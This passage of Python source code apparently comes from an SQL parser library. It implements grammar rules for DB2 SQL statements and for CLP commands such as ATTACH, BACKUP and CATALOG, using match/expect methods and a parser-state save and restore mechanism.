elif (self._match_sequence(['EVENT', 'MONITOR']) or
self._match('NODEGROUP') or
self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']) or
self._match('SCHEMA') or
self._match('TABLESPACE') or
self._match('TRIGGER')):
self._expect(TT.IDENTIFIER)
else:
self._expected_one_of([
'ALIAS',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'INDEX',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'SCHEMA',
'SEQUENCE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'TRIGGER',
'TYPE',
'VARIABLE',
'VIEW',
])
if self._match('USER'):
self._expect(TT.IDENTIFIER)
else:
self._expect_one_of([
(TT.REGISTER, 'USER'),
(TT.REGISTER, 'SESSION_USER'),
(TT.REGISTER, 'SYSTEM_USER'),
])
        self._expect_sequence(['PRESERVE', 'PRIVILEGES'])
def _parse_truncate_statement(self):
"""Parses a TRUNCATE statement"""
# TRUNCATE already matched
self._match('TABLE')
self._parse_table_name()
if self._match_one_of(['DROP', 'REUSE']):
self._expect('STORAGE')
if self._match('IGNORE') or self._match_sequence(['RESTRICT', 'WHEN']):
self._expect_sequence(['DELETE', 'TRIGGERS'])
self._match_sequence(['CONTINUE', 'IDENTITY'])
self._expect('IMMEDIATE')
def _parse_update_statement(self):
"""Parses an UPDATE statement"""
# UPDATE already matched
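        # e.g. UPDATE t1 AS t SET c1 = DEFAULT WHERE t.c2 > 0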
if self._match('('):
self._indent()
self._parse_full_select()
self._outdent()
self._expect(')')
else:
self._parse_subschema_name()
# Ambiguity: INCLUDE is an identifier and hence can look like a table
# correlation name
reraise = False
self._save_state()
try:
# Try and parse a mandatory table correlation followed by a
# mandatory INCLUDE
self._parse_table_correlation(optional=False)
self._newline()
self._expect('INCLUDE')
reraise = True
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
except ParseError:
# If that fails, rewind and parse an optional INCLUDE or an
# optional table correlation
self._restore_state()
if reraise: raise
if self._match('INCLUDE'):
self._newline(-1)
self._expect('(')
self._indent()
self._parse_ident_type_list(newlines=True)
self._outdent()
self._expect(')')
else:
self._parse_table_correlation()
else:
self._forget_state()
# Parse mandatory assignment clause allow DEFAULT values
self._expect('SET')
self._indent()
self._parse_assignment_clause(allowdefault=True)
self._outdent()
if self._match('WHERE'):
self._indent()
self._parse_search_condition()
self._outdent()
if self._match('WITH'):
self._expect_one_of(['RR', 'RS', 'CS', 'UR'])
def _parse_while_statement(self, label=None):
"""Parses a WHILE-loop in a dynamic compound statement"""
# WHILE already matched
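        # e.g. WHILE i < 10 DO SET i = i + 1; END WHILE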
self._parse_search_condition(newlines=False)
self._newline()
self._expect('DO')
self._indent()
while True:
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
if self._match('END'):
self._outdent(-1)
break
else:
self._newline()
self._expect('WHILE')
if label:
self._match((TT.IDENTIFIER, label))
# COMPOUND STATEMENTS ####################################################
def _parse_compiled_statement(self):
"""Parses a procedure statement within a procedure body"""
# XXX Should PREPARE be supported here?
try:
label = self._expect(TT.LABEL).value
self._newline()
except ParseError:
label = None
# Procedure specific statements
if self._match('ALLOCATE'):
self._parse_allocate_cursor_statement()
elif self._match('ASSOCIATE'):
self._parse_associate_locators_statement()
elif self._match('BEGIN'):
self._parse_compiled_compound_statement(label=label)
elif self._match('CASE'):
self._parse_case_statement()
elif self._match('CLOSE'):
self._parse_close_statement()
elif self._match_sequence(['EXECUTE', 'IMMEDIATE']):
self._parse_execute_immediate_statement()
elif self._match('EXECUTE'):
self._parse_execute_statement()
elif self._match('FETCH'):
self._parse_fetch_statement()
elif self._match('GOTO'):
self._parse_goto_statement()
elif self._match('LOOP'):
self._parse_loop_statement(label=label)
elif self._match('PREPARE'):
self._parse_prepare_statement()
elif self._match('OPEN'):
self._parse_open_statement()
elif self._match('REPEAT'):
self._parse_repeat_statement(label=label)
# Dynamic compound specific statements
elif self._match('FOR'):
self._parse_for_statement(label=label)
elif self._match_sequence(['GET', 'DIAGNOSTICS']):
self._parse_get_diagnostics_statement()
elif self._match('IF'):
self._parse_if_statement()
elif self._match('ITERATE'):
self._parse_iterate_statement()
elif self._match('LEAVE'):
self._parse_leave_statement()
elif self._match('RETURN'):
self._parse_return_statement()
elif self._match('SET'):
self._parse_set_statement()
elif self._match('SIGNAL'):
self._parse_signal_statement()
elif self._match('WHILE'):
self._parse_while_statement(label=label)
# Generic SQL statements
elif self._match('AUDIT'):
self._parse_audit_statement()
elif self._match('CALL'):
self._parse_call_statement()
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('COMMIT'):
self._parse_commit_statement()
elif self._match('CREATE'):
self._match_sequence(['OR', 'REPLACE'])
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
self._parse_create_view_statement()
elif self._match('UNIQUE'):
self._expect('INDEX')
self._parse_create_index_statement()
elif self._match('INDEX'):
self._parse_create_index_statement()
else:
self._expected_one_of(['TABLE', 'VIEW', 'INDEX', 'UNIQUE'])
elif self._match_sequence(['DECLARE', 'GLOBAL', 'TEMPORARY', 'TABLE']):
self._parse_declare_global_temporary_table_statement()
elif self._match('DELETE'):
self._parse_delete_statement()
elif self._match('DROP'):
# XXX Limit this to tables, views and indexes somehow?
self._parse_drop_statement()
elif self._match('EXPLAIN'):
self._parse_explain_statement()
elif self._match_sequence(['FLUSH', 'OPTIMIZATION', 'PROFILE', 'CACHE']):
self._parse_flush_optimization_profile_cache_statement()
elif self._match_sequence(['FREE', 'LOCATOR']):
self._parse_free_locator_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match_sequence(['LOCK', 'TABLE']):
self._parse_lock_table_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match('RELEASE'):
self._match('TO')
self._expect('SAVEPOINT')
self._parse_release_savepoint_statement()
elif self._match('RESIGNAL'):
self._parse_resignal_statement()
elif self._match('ROLLBACK'):
self._parse_rollback_statement()
elif self._match('SAVEPOINT'):
self._parse_savepoint_statement()
elif self._match_sequence(['TRANSFER', 'OWNERSHIP']):
self._parse_transfer_ownership_statement()
elif self._match('TRUNCATE'):
self._parse_truncate_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement(allowinto=True)
def _parse_compiled_compound_statement(self, label=None):
"""Parses a procedure compound statement (body)"""
# BEGIN already matched
if self._match('NOT'):
self._expect('ATOMIC')
else:
self._match('ATOMIC')
self._indent()
# Ambiguity: there's several statements beginning with DECLARE that can
# occur mixed together or in a specific order here, so we use saved
# states to test for each consecutive block of DECLAREs
# Try and parse DECLARE variable|condition|return-code
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
if self._match('SQLSTATE'):
reraise = True
self._expect_one_of(['CHAR', 'CHARACTER'])
self._expect_sequence(['(', (TT.NUMBER, 5), ')'], prespace=False)
self._match_sequence(['DEFAULT', TT.STRING])
elif self._match('SQLCODE'):
reraise = True
self._expect_one_of(['INT', 'INTEGER'])
self._match_sequence(['DEFAULT', TT.NUMBER])
else:
count = len(self._parse_ident_list())
if count == 1 and self._match('CONDITION'):
reraise = True
self._expect('FOR')
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
else:
self._parse_datatype()
if self._match('DEFAULT'):
reraise = True
self._parse_expression()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE statement
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
self._parse_ident_list()
self._expect('STATEMENT')
reraise = True
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE CURSOR
while True:
reraise = False
self._save_state()
try:
self._expect_sequence(['DECLARE', TT.IDENTIFIER, 'CURSOR'])
reraise = True
if self._match('WITH'):
if self._match('RETURN'):
self._expect('TO')
self._expect_one_of(['CALLER', 'CLIENT'])
else:
self._expect('HOLD')
if self._match('WITH'):
self._expect_sequence(['RETURN', 'TO'])
self._expect_one_of(['CALLER', 'CLIENT'])
self._expect('FOR')
# Ambiguity: statement name could be reserved word
self._save_state()
try:
# Try and parse a SELECT statement
# XXX Is SELECT INTO permitted in a DECLARE CURSOR?
self._parse_select_statement()
except ParseError:
# If that fails, rewind and parse a simple statement name
self._restore_state()
self._expect(TT.IDENTIFIER)
else:
self._forget_state()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Try and parse DECLARE HANDLER
while True:
reraise = False
self._save_state()
try:
self._expect('DECLARE')
self._expect_one_of(['CONTINUE', 'UNDO', 'EXIT'])
self._expect('HANDLER')
reraise = True
self._expect('FOR')
self._save_state()
try:
while True:
if self._match('NOT'):
self._expect('FOUND')
else:
self._expect_one_of(['NOT', 'SQLEXCEPTION', 'SQLWARNING'])
if not self._match(','):
break
except ParseError:
self._restore_state()
while True:
if self._match('SQLSTATE'):
self._match('VALUE')
self._expect(TT.STRING)
else:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
else:
self._forget_state()
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
except ParseError:
self._restore_state()
if reraise: raise
break
else:
self._forget_state()
# Parse procedure statements
while not self._match('END'):
self._parse_compiled_statement()
self._expect((TT.TERMINATOR, ';'))
self._newline()
self._outdent(-1)
if label:
self._match((TT.IDENTIFIER, label))
def _parse_statement(self):
"""Parses a top-level statement in an SQL script"""
# XXX CREATE EVENT MONITOR
# If we're reformatting WHITESPACE, add a blank WHITESPACE token to the
# output - this will suppress leading whitespace in front of the first
# word of the statement
self._output.append(Token(TT.WHITESPACE, None, '', 0, 0))
if self._match('ALTER'):
if self._match('TABLE'):
self._parse_alter_table_statement()
elif self._match('SEQUENCE'):
self._parse_alter_sequence_statement()
elif self._match('FUNCTION'):
self._parse_alter_function_statement(specific=False)
elif self._match('PROCEDURE'):
self._parse_alter_procedure_statement(specific=False)
elif self._match('SPECIFIC'):
if self._match('FUNCTION'):
self._parse_alter_function_statement(specific=True)
elif self._match('PROCEDURE'):
self._parse_alter_procedure_statement(specific=True)
else:
self._expected_one_of(['FUNCTION', 'PROCEDURE'])
elif self._match('NICKNAME'):
self._parse_alter_nickname_statement()
elif self._match('TABLESPACE'):
self._parse_alter_tablespace_statement()
elif self._match('BUFFERPOOL'):
self._parse_alter_bufferpool_statement()
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._parse_alter_partition_group_statement()
elif self._match('DATABASE'):
self._parse_alter_database_statement()
elif self._match('NODEGROUP'):
self._parse_alter_partition_group_statement()
elif self._match('SERVER'):
self._parse_alter_server()
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._parse_alter_histogram_template_statement()
elif self._match_sequence(['AUDIT', 'POLICY']):
self._parse_alter_audit_policy_statement()
elif self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']):
self._parse_alter_security_label_component_statement()
elif self._match_sequence(['SECURITY', 'POLICY']):
self._parse_alter_security_policy_statement()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._parse_alter_service_class_statement()
elif self._match('THRESHOLD'):
self._parse_alter_threshold_statement()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._parse_alter_trusted_context_statement()
elif self._match_sequence(['USER', 'MAPPING']):
self._parse_alter_user_mapping_statement()
elif self._match('VIEW'):
self._parse_alter_view_statement()
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._parse_alter_work_action_set_statement()
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._parse_alter_work_class_set_statement()
elif self._match('WORKLOAD'):
self._parse_alter_workload_statement()
elif self._match('WRAPPER'):
self._parse_alter_wrapper_statement()
elif self._match('MODULE'):
self._parse_alter_module_statement()
else:
self._expected_one_of([
'AUDIT',
'BUFFERPOOL',
'DATABASE',
'FUNCTION',
'HISTOGRAM',
'MODULE',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'SECURITY',
'SEQUENCE',
'SERVER',
'SERVICE',
'SPECIFIC',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRUSTED',
'USER',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
elif self._match('AUDIT'):
self._parse_audit_statement()
elif self._match('BEGIN'):
self._parse_compiled_compound_statement()
elif self._match('CALL'):
self._parse_call_statement()
elif self._match_sequence(['COMMENT', 'ON']):
self._parse_comment_statement()
elif self._match('COMMIT'):
self._parse_commit_statement()
elif self._match('CREATE'):
self._match_sequence(['OR', 'REPLACE'])
if self._match('TABLE'):
self._parse_create_table_statement()
elif self._match('VIEW'):
self._parse_create_view_statement()
elif self._match('ALIAS'):
self._parse_create_alias_statement()
elif self._match_sequence(['UNIQUE', 'INDEX']):
self._parse_create_index_statement(unique=True)
elif self._match('INDEX'):
self._parse_create_index_statement(unique=False)
elif self._match('DISTINCT'):
self._expect('TYPE')
self._parse_create_type_statement()
elif self._match('SEQUENCE'):
self._parse_create_sequence_statement()
elif self._match_sequence(['FUNCTION', 'MAPPING']):
self._parse_create_function_mapping_statement()
elif self._match('FUNCTION'):
self._parse_create_function_statement()
elif self._match('PROCEDURE'):
self._parse_create_procedure_statement()
elif self._match('TABLESPACE'):
self._parse_create_tablespace_statement()
elif self._match('BUFFERPOOL'):
self._parse_create_bufferpool_statement()
elif self._match_sequence(['DATABASE', 'PARTITION', 'GROUP']):
self._parse_create_database_partition_group_statement()
elif self._match('NODEGROUP'):
self._parse_create_database_partition_group_statement()
elif self._match('TRIGGER'):
self._parse_create_trigger_statement()
elif self._match('SCHEMA'):
self._parse_create_schema_statement()
elif self._match_sequence(['AUDIT', 'POLICY']):
self._parse_create_audit_policy_statement()
elif self._match_sequence(['EVENT', 'MONITOR']):
self._parse_create_event_monitor_statement()
elif self._match_sequence(['HISTOGRAM', 'TEMPLATE']):
self._parse_create_histogram_template_statement()
elif self._match('NICKNAME'):
self._parse_create_nickname_statement()
elif self._match('ROLE'):
self._parse_create_role_statement()
elif self._match_sequence(['SECURITY', 'LABEL', 'COMPONENT']):
self._parse_create_security_label_component_statement()
elif self._match_sequence(['SECURITY', 'LABEL']):
self._parse_create_security_label_statement()
elif self._match_sequence(['SECURITY', 'POLICY']):
self._parse_create_security_policy_statement()
elif self._match_sequence(['SERVICE', 'CLASS']):
self._parse_create_service_class_statement()
elif self._match('SERVER'):
self._parse_create_server_statement()
elif self._match('THRESHOLD'):
self._parse_create_threshold_statement()
elif self._match_sequence(['TRUSTED', 'CONTEXT']):
self._parse_create_trusted_context_statement()
elif self._match_sequence(['TYPE', 'MAPPING']):
self._parse_create_type_mapping_statement()
elif self._match('TYPE'):
self._parse_create_type_statement()
elif self._match_sequence(['USER', 'MAPPING']):
self._parse_create_user_mapping_statement()
elif self._match('VARIABLE'):
self._parse_create_variable_statement()
elif self._match_sequence(['WORK', 'ACTION', 'SET']):
self._parse_create_work_action_set_statement()
elif self._match_sequence(['WORK', 'CLASS', 'SET']):
self._parse_create_work_class_set_statement()
elif self._match('WORKLOAD'):
self._parse_create_workload_statement()
elif self._match('WRAPPER'):
self._parse_create_wrapper_statement()
elif self._match('MODULE'):
self._parse_create_module_statement()
else:
tbspacetype = self._match_one_of([
'REGULAR',
'LONG',
'LARGE',
'TEMPORARY',
'USER',
'SYSTEM',
])
if tbspacetype:
tbspacetype = tbspacetype.value
if tbspacetype in ('USER', 'SYSTEM'):
self._expect('TEMPORARY')
elif tbspacetype == 'TEMPORARY':
tbspacetype = 'SYSTEM'
elif tbspacetype == 'LONG':
tbspacetype = 'LARGE'
self._expect('TABLESPACE')
self._parse_create_tablespace_statement(tbspacetype)
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'BUFFERPOOL',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'INDEX',
'MODULE',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'ROLE',
'SECURITY',
'SEQUENCE',
'SERVER',
'SERVICE',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'UNIQUE',
'USER',
'VARIABLE',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
elif self._match('DELETE'):
self._parse_delete_statement()
elif self._match('DROP'):
self._parse_drop_statement()
elif self._match_sequence(['DECLARE', 'GLOBAL', 'TEMPORARY', 'TABLE']):
self._parse_declare_global_temporary_table_statement()
elif self._match('DECLARE'):
self._parse_declare_cursor_statement()
elif self._match('EXPLAIN'):
self._parse_explain_statement()
elif self._match_sequence(['FLUSH', 'OPTIMIZATION', 'PROFILE', 'CACHE']):
self._parse_flush_optimization_profile_cache_statement()
elif self._match_sequence(['FREE', 'LOCATOR']):
self._parse_free_locator_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match_sequence(['LOCK', 'TABLE']):
self._parse_lock_table_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match_sequence(['REFRESH', 'TABLE']):
self._parse_refresh_table_statement()
elif self._match('RELEASE'):
self._match('TO')
self._expect('SAVEPOINT')
self._parse_release_savepoint_statement()
elif self._match_sequence(['RENAME', 'TABLESPACE']):
self._parse_rename_tablespace_statement()
elif self._match('RENAME'):
self._parse_rename_statement()
elif self._match('REVOKE'):
self._parse_revoke_statement()
elif self._match('ROLLBACK'):
self._parse_rollback_statement()
elif self._match('SAVEPOINT'):
self._parse_savepoint_statement()
elif self._match_sequence(['SET', 'INTEGRITY']):
self._parse_set_integrity_statement()
elif self._match('SET'):
self._parse_set_statement()
elif self._match_sequence(['TRANSFER', 'OWNERSHIP']):
self._parse_transfer_ownership_statement()
elif self._match('TRUNCATE'):
self._parse_truncate_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement()
def parse_routine_prototype(self, tokens):
"""Parses a routine prototype"""
        # It's a bit of a hack sticking this here. This method doesn't really
# belong here and should probably be in a sub-class (it's only used
# for syntax highlighting function prototypes in the documentation
# system)
self._parse_init(tokens)
# Skip leading whitespace
if self._token().type in (TT.COMMENT, TT.WHITESPACE):
self._index += 1
self._parse_function_name()
# Parenthesized parameter list is mandatory
self._expect('(', prespace=False)
if not self._match(')'):
while True:
self._match_one_of(['IN', 'OUT', 'INOUT'])
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
if not self._match(','):
break
self._expect(')')
# Parse the return type
if self._match('RETURNS'):
if self._match_one_of(['ROW', 'TABLE']):
self._expect('(')
self._parse_ident_type_list()
self._expect(')')
else:
self._parse_datatype()
self._parse_finish()
return self._output
Connection = namedtuple('Connection', ('instance', 'database', 'username', 'password'))
class DB2ZOSScriptParser(DB2ZOSParser):
"""Parser which handles the DB2 UDB CLP dialect.
This class inherits from the DB2 SQL language parser and as such is capable
of parsing all the statements that the parent class is capable of. In
addition, it adds the ability to parse the non-SQL CLP commands (like
IMPORT, EXPORT, LOAD, CREATE DATABASE, etc).
"""
def __init__(self):
super(DB2ZOSScriptParser, self).__init__()
self.connections = []
self.produces = []
self.consumes = []
self.current_user = None
self.current_instance = None
self.current_connection = None
def _match_clp_string(self, password=False):
"""Attempts to match the current tokens as a CLP-style string.
The _match_clp_string() method is used to match a CLP-style string.
The "real" CLP has a fundamentally different style of parser to the
DB2 SQL parser, and includes several behaviours that are difficult
        to replicate in this parser (which was primarily targeted at the
DB2 SQL dialect). One of these is the CLP's habit of treating an
unquoted run of non-whitespace tokens as a string, or allowing a
quoted identifier to be treated as a string.
When this method is called it will return a STRING token consisting
of the content of the aforementioned tokens (or None if a CLP-style
string is not found in the source at the current position).
"""
token = self._token()
if token.type == TT.STRING:
# STRINGs are treated verbatim
self._index += 1
elif token.type == TT.IDENTIFIER and token.source[0] == '"':
            # Double quoted identifiers are converted to STRING tokens
token = Token(TT.STRING, token.value, quote_str(token.value, "'"), token.line, token.column)
self._index += 1
elif not token.type in (TT.TERMINATOR, TT.EOF):
            # Otherwise, any run of non-whitespace tokens is converted to a
# single STRING token
start = self._index
self._index += 1
while True:
token = self._token()
if token.type == TT.STRING:
raise ParseError(self._tokens, token, "Quotes (') not permitted in identifier")
if token.type == TT.IDENTIFIER and token.source[0] == '"':
raise ParseError(self._tokens, token, 'Quotes (") not permitted in identifier')
if token.type in (TT.WHITESPACE, TT.COMMENT, TT.TERMINATOR, TT.EOF):
break
self._index += 1
content = ''.join([token.source for token in self._tokens[start:self._index]])
token = Token(TT.STRING, content, quote_str(content, "'"), self._tokens[start].line, self._tokens[start].column)
else:
token = None
if token:
if not (self._output and self._output[-1].type in (TT.INDENT, TT.WHITESPACE)):
self._output.append(Token(TT.WHITESPACE, None, ' ', 0, 0))
if password:
token = Token(TT.PASSWORD, token.value, token.source, token.line, token.column)
self._output.append(token)
# Skip WHITESPACE and COMMENTS
while self._token().type in (TT.COMMENT, TT.WHITESPACE):
if self._token().type == TT.COMMENT or TT.WHITESPACE not in self.reformat:
self._output.append(self._token())
self._index += 1
return token
def _expect_clp_string(self, password=False):
"""Matches the current tokens as a CLP-style string, or raises an error.
See _match_clp_string() above for details of the algorithm.
"""
result = self._match_clp_string(password)
if not result:
raise ParseExpectedOneOfError(self._tokens, self._token(), [TT.PASSWORD if password else TT.STRING])
return result
# PATTERNS ###############################################################
def _parse_clp_string_list(self):
"""Parses a comma separated list of strings.
This is a common pattern in CLP, for example within the LOBS TO clause of
the EXPORT command. The method returns the list of strings found.
"""
result = []
while True:
result.append(self._expect_clp_string().value)
if not self._match(','):
break
return result
def _parse_number_list(self):
"""Parses a comma separated list of number.
This is a common pattern in CLP, for example within the METHOD clause of
the IMPORT or LOAD commands. The method returns the list of numbers
found.
"""
result = []
while True:
result.append(self._expect(TT.NUMBER).value)
if not self._match(','):
break
return result
def _parse_login(self, optional=True, allowchange=False):
"""Parses a set of login credentials"""
username = None
password = None
if self._match('USER'):
username = self._expect_clp_string().value
if self._match('USING'):
password = self._expect_clp_string(password=True).value
if allowchange:
if self._match('NEW'):
password = self._expect_clp_string(password=True).value
self._expect('CONFIRM')
self._expect_clp_string(password=True)
else:
self._match_sequence(['CHANGE', 'PASSWORD'])
elif not optional:
self._expected('USER')
return (username, password)
# COMMANDS ###############################################################
def _parse_activate_database_command(self):
"""Parses an ACTIVATE DATABASE command"""
# ACTIVATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_add_contact_command(self):
"""Parses an ADD CONTACT command"""
# ADD CONTACT already matched
self._expect_clp_string()
self._expect('TYPE')
if self._expect_one_of(['EMAIL', 'PAGE']).value == 'PAGE':
if self._match_sequence(['MAXIMUM', 'PAGE', 'LENGTH']) or self._match_sequence(['MAX', 'LEN']):
self._expect(TT.NUMBER)
self._expect('ADDRESS')
self._expect_clp_string()
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_add_contactgroup_command(self):
"""Parses an ADD CONTACTGROUP command"""
# ADD CONTACTGROUP already matched
self._expect_clp_string()
while True:
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
            if not self._match(','):
break
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_add_dbpartitionnum_command(self):
"""Parses an ADD DBPARTITIONNUM command"""
# ADD DBPARTITIONNUM already matched
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
def _parse_add_xmlschema_document_command(self):
"""Parses an ADD XMLSCHEMA DOCUMENT command"""
# ADD XMLSCHEMA DOCUMENT already matched
self._expect('TO')
self._parse_subschema_name()
self._expect('ADD')
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match('COMPLETE'):
if self._match('WITH'):
self._expect_clp_string()
self._match_sequence(['ENABLE', 'DECOMPOSITION'])
def _parse_archive_log_command(self):
"""Parses an ARCHIVE LOG command"""
# ARCHIVE LOG already matched
self._expect('FOR')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
if self._match('USER'):
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
self._parse_db_partitions_clause()
def _parse_attach_command(self):
"""Parses an ATTACH command"""
# ATTACH already matched
if self._match('TO'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=True)
def _parse_autoconfigure_command(self):
"""Parses an AUTOCONFIGURE command"""
# AUTOCONFIGURE already matched
if self._match('USING'):
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._match('APPLY'):
break
else:
self._expect('APPLY')
if self._match('DB'):
if self._match('AND'):
self._expect('DBM')
else:
self._expect('ONLY')
elif self._match('NONE'):
pass
else:
self._expected_one_of(['DB', 'NONE'])
self._match_sequence(['ON', 'CURRENT', 'NODE'])
def _parse_backup_command(self):
"""Parses a BACKUP DB command"""
# BACKUP [DATABASE|DB] already matched
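        # e.g. BACKUP DB sample ONLINE TO /backups COMPRESS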
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
self._parse_db_partitions_clause()
if self._match('TABLESPACE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
if self._match('INCREMENTAL'):
self._match('DELTA')
if self._match('USE'):
if self._match('SNAPSHOT'):
if self._match('LIBRARY'):
self._expect_clp_string()
elif self._match_one_of(['TSM', 'XBSA']):
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
elif self._match('TO'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
self._match('DEDUP_DEVICE')
if self._match('WITH'):
self._expect(TT.NUMBER)
self._expect('BUFFERS')
if self._match('BUFFER'):
self._expect(TT.NUMBER)
if self._match('PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('COMPRESS'):
if self._match('COMPRLIB'):
self._expect_clp_string()
self._match('EXCLUDE')
if self._match('COMPROPTS'):
self._expect_clp_string()
if self._match('UTIL_IMPACT_PRIORITY'):
self._match(TT.NUMBER)
if self._match_one_of(['EXCLUDE', 'INCLUDE']):
self._expect('LOGS')
if self._match('WITHOUT'):
self._expect('PROMPTING')
# XXX Add support for BIND command
def _parse_catalog_command(self):
"""Parses a CATALOG command"""
# CATALOG already matched
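        # Hypothetical examples (names illustrative, not from the source):
        #   CATALOG TCPIP NODE dbnode REMOTE dbhost.example.com SERVER 50000
        #   CATALOG DATABASE sample AS mydb AT NODE dbnode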
if self._match_one_of(['USER', 'SYSTEM']):
self._expect('ODBC')
if self._match_sequence(['DATA', 'SOURCE']):
self._expect_clp_string()
else:
self._expect_sequence(['ALL', 'DATA', 'SOURCES'])
elif self._match('ODBC'):
if self._match_sequence(['DATA', 'SOURCE']):
self._expect_clp_string()
else:
self._expect_sequence(['ALL', 'DATA', 'SOURCES'])
elif self._match_one_of(['DATABASE', 'DB']):
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match('ON'):
self._expect_clp_string()
elif self._match_sequence(['AT', 'NODE']):
self._expect_clp_string()
if self._match('AUTHENTICATION'):
if self._match_sequence(['KERBEROS', 'TARGET', 'PRINCIPAL']):
self._expect_clp_string()
else:
self._expect_one_of([
'SERVER',
'CLIENT',
'SERVER_ENCRYPT',
'SERVER_ENCRYPT_AES',
'KERBEROS',
'DATA_ENCRYPT',
'DATA_ENCRYPT_CMP',
'GSSPLUGIN',
'DCS',
'DCS_ENCRYPT',
])
if self._match('WITH'):
self._expect_clp_string()
elif self._match('DCS'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match('AR'):
self._expect_clp_string()
if self._match('PARMS'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
elif self._match('LDAP'):
if self._match_one_of(['DATABASE', 'DB']):
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match_sequence(['AT', 'NODE']):
self._expect_clp_string()
if self._match('GWNODE'):
self._expect_clp_string()
if self._match('PARMS'):
self._expect_clp_string()
if self._match('AR'):
self._expect_clp_string()
if self._match_sequence(['KERBEROS', 'TARGET', 'PRINCIPAL']):
self._expect_clp_string()
else:
self._expect_one_of([
'SERVER',
'CLIENT',
'SERVER_ENCRYPT',
'SERVER_ENCRYPT_AES',
'KERBEROS',
'DCS',
'DCS_ENCRYPT',
'DATA_ENCRYPT',
'GSSPLUGIN',
])
if self._match('WITH'):
self._expect_clp_string()
elif self._match('NODE'):
self._expect_clp_string()
self._expect('AS')
self._expect_clp_string()
else:
self._expected_one_of(['DATABASE', 'DB', 'NODE'])
self._parse_login(optional=True, allowchange=False)
else:
self._match('ADMIN')
if self._match_sequence(['LOCAL', 'NODE']):
self._expect_clp_string()
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
elif self._match_sequence(['NPIPE', 'NODE']):
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('INSTANCE')
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
